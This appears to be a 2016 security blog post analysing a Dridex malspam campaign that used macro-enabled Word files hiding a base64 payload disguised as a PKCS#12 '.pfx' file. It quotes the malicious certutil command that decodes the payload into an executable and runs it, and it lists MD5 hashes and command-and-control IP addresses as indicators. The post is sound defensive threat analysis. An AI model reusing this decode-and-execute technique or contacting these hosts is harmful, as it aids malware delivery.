Wednesday, May 25, 2016

Dridex campaign on the 23rd and 24rd of May - using fake PKCS#12 files

Dridex has been very active in the last 2 days. 

I have seen more than 40k emails sent during a window frame of 36 hour and I have identified around 300 different samples. The samples size are between 260KB and 360KB and all of them are MS Word office documents.

Last week I wrote here about the last Locky campaign and the techniques used by the cyber criminals to fool the victims.  Dridex and Locky Threat Actors are very close friends ;-)
and they are sharing some of the TTP they are using in their campaigns ;-)
Currently, In both cases, they have been sending a blank MS word office document which requieres to enable macros

In the Dridex campaign there are some particular interesting points.



Debugging the VBA code of the the Macro, which it is password protected, the first interesting thing I see is that the Windows command 'certutil' is used. This command handles digital certificates in windows. 



The command is:

"cmd /c certutil -decode %TMP%\\harakiri.pfx %TMP%\\harakiri.exe & start %TMP%\\harakiri.exe"


Usually PFX files are PKCS#12 containers which stores certificates. What's going on?

in this case, the command is not related to digital certificates at all, but it is just converting some base64 strings stored in a file name "harakiri.pfx" and dumping into an executable file name "harakiri.exe". After that, the file harakiri.exe is executed.

The harakiri.pfx is inside the MS Word file. Looking into the malicious file I see a bunch of base64 starting in offset DC80
 

and ending in offset 56104




Now, dumping that set of data (from offset DC80 up to offset 56104) and decoding with base64, the same way that the command 'certutil' does, I obtain a PE file. This is the file which later is executed when running the macro




The file obtained is already reported in VT https://www.virustotal.com/en/file/08c9b30c7f01dbbc41fb0f11768a15cfe0d68a524acd338eb880e1704575370b/analysis/

This time the VBA inside the MS office document is not dropping anything from Internet,  but just extracting and converting the PE file inside itself.

Some IOCs

9230dde2cfb1fcb641f3a25171ffadb2

3141fcce028913f34484f1d90a1bfbc7

5a93499e100e0cfd987c331c9dc1930a

60322d81c8d22c7e71efd471c8b6c8c5

76148125eeb97f9284262cb6e1915641

645598660fe6e184bc1d59816796f54d

918aa9994bac90cc28ad51fae7e35128

594c13bd90f9ce0025da1cc31c02002a

2798b6f9723d4a78800be3d9bd2bb00a

b2e4df0f3139b4039447b209326b758c

80.88.89.222:11443
213.192.1.171:40443
50.56.118.137:4033 
84.40.2.227:11443 
162.251.84.219:4343 
24.199.222.250:4343 
160.16.69.29:11443

188.120.253.193:40443